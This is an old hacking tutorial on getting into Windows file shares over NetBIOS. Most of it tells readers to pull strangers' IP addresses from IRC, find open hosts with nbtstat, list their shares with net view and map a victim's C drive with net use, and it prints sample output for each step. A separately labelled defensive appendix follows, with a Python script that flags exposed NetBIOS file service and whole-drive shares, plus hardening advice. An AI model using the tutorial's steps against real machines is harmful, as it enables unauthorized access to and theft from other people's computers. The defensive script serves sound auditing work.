A - How The Hack Works
NetBIOS is a TCP/IP protocol [this means that it runs over the internet]. It is used to share files and printers, and the port that NetBIOS runs on is 139. It is easy to hack because Windows comes with installed programs that can exploit this vulnerability. There aren't as many people open to this attack as in the past, but there are still a few.
B - Getting Started
First of all you need NetBIOS enabled on your box. To do this in XP, go to your dial-up connection properties, click on TCP/IP properties, click the Advanced tab, then WINS, and enable it down the bottom, then restart. Mind, this is for XP only; it should be enabled automatically on any other version. Next, find a target. The best way to do this is to get mIRC, a good IRC client for winblowz. Get it up and running and use /dns <username> to get an IP address. Then open up command prompt or MS-DOS, type nbtstat -A ip address, hit enter and wait. You should get 1 of 2 screens:
1 - host not found, [or something like that]
2 - C:\>nbtstat -A 192.168.0.99
Local Area Connection:
Node ip_address: [192.168.0.99] Scope Id: []
NetBIOS Remote Machine Name Table
Name           Type          Status
---------------------------------------------
SERVER    <00> UNIQUE        Registered
SLASHER   <00> GROUP         Registered
SERVER    <03> UNIQUE        Registered
SERVER    <20> UNIQUE        Registered
SLASHER   <1E> GROUP         Registered
SLASHER   <1D> UNIQUE        Registered
MSBROWSE  <01> GROUP         Registered
SERVER    <01> UNIQUE        Registered
MAC Address = 00-02-E3-05-AE-ED
Well, this tells all. See the <20> hex? This is what we are looking for: it lets us know that this box is open and hackable. There are a few exceptions to this rule, but 90% of the time this is the case. If you can't find a host the first time, just keep trying; there are lots of open comps out there. Now that we have found an open host, let's start hacking. To view the host's shares [that's what we are hacking], type net view \\ip address. You should get a list something like this:
C:\>net view \\192.168.0.99
Shared resources at \\192.168.0.99
850
Share name   Type   Used as   Comment
--------------------------------------
C:\          Disk
cd-rom       Disk
GAMES (D)    Disk
Printer      Print            HP DeskJet 692C
SharedDocs   Disk
So now that you have found out the names of the shares, it is time to start looking inside them. There are two ways to do this:
1 - Type the IP into your browser [Internet Explorer] like so: \\ip address
2 - Type net use x: \\ipaddress\sharename [example: net use x: \\123.123.123.123\c]
The second command is good because you can view the shares in DOS, thus speeding up the load time. What it does is map the C drive of the remote host to a local drive, in this case x:, on your computer, so just type x: into your shell [command prompt, MS-DOS] and browse just like it was your C drive.
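Seen from the defending side, the two listings above are exactly what an administrator should check on machines they run: whether the <20> file server name is registered and whether a whole drive is shared. The script below is an added example, not part of the original page; the function names and the drive-root heuristic are assumptions, and the sample input is constructed by abridging the listings above.

```python
import re

# Suffix (16th byte of a NetBIOS name) and name type -> registering service.
SUFFIXES = {
    ("00", "UNIQUE"): "Workstation service", ("00", "GROUP"): "Workgroup or domain name",
    ("01", "UNIQUE"): "Messenger service", ("01", "GROUP"): "Master browser (__MSBROWSE__)",
    ("03", "UNIQUE"): "Messenger service", ("1D", "UNIQUE"): "Master browser",
    ("1E", "GROUP"): "Browser service elections", ("20", "UNIQUE"): "File server service",
}
NAME_ROW = re.compile(r"^\s*(.+?)\s*<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\w+)")
SHARE_ROW = re.compile(r"^(.+?)\s+(Disk|Print|IPC)\b\s*(.*)$")
DRIVE_ROOT = re.compile(r"^[A-Za-z](:\\?|\$)?$")  # heuristic: C, C:, C:\ or C$

def parse_name_table(text):
    """Return (name, suffix, type, service) for each row of saved nbtstat -A output."""
    rows = []
    for line in text.splitlines():
        m = NAME_ROW.match(line)
        if m:
            key = (m.group(2).upper(), m.group(3))
            rows.append((m.group(1), *key, SUFFIXES.get(key, "unknown")))
    return rows

def parse_shares(text):
    """Return (share name, type) for each row below the dashed rule of net view output."""
    body = re.split(r"^-{5,}\s*$", text, maxsplit=1, flags=re.M)[-1]
    return [(m.group(1), m.group(2)) for m in map(SHARE_ROW.match, body.splitlines()) if m]

def findings(nbtstat_text, net_view_text):
    """List hardening findings for one host you administer."""
    out = []
    if any(row[1:3] == ("20", "UNIQUE") for row in parse_name_table(nbtstat_text)):
        out.append("file server service <20> is registered over NetBIOS")
    for share, kind in parse_shares(net_view_text):
        if kind == "Disk" and DRIVE_ROOT.match(share):
            out.append(f"whole drive shared: {share}")
    return out

# Constructed sample input, abridged from the two listings on this page.
NBTSTAT = r"""Name Type Status
---------------------------------------------
SERVER <00> UNIQUE Registered
SERVER <20> UNIQUE Registered
SLASHER <1E> GROUP Registered"""
NET_VIEW = r"""Share name Type Used as Comment
--------------------------------------
C:\ Disk
GAMES (D) Disk
Printer Print HP DeskJet 692C"""
```

A host that reports either finding can have NetBIOS over TCP/IP switched off on the same WINS tab described in section B, and the whole-drive share removed or replaced with a password-protected folder share.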